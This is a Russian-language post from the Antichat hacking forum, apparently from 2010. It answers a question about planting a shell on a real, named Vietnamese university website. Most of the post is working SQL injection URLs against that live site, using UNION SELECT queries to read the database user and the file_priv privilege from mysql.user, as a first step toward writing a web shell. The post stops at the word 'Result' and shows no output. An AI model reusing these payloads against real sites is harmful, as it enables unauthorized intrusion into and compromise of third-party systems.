07.07.2010, 13:08
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от haito
Этот сайт позволяет file_priv, но мы можем заполнить оболочку?
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201, file_priv,3,4,5,6,7,8,9%20from%20mysql.user+--+
У твоего пользователя нету file_priv:
Код:
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9+--+
Получаем юзера - DCE. Смотрим дальше:
Код:
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,concat_ws(0x3a,user,file_priv),'3',4,5,6,7,8,9%20from%20mysql.user+limit+5,1+--+
Результат:
|
|
|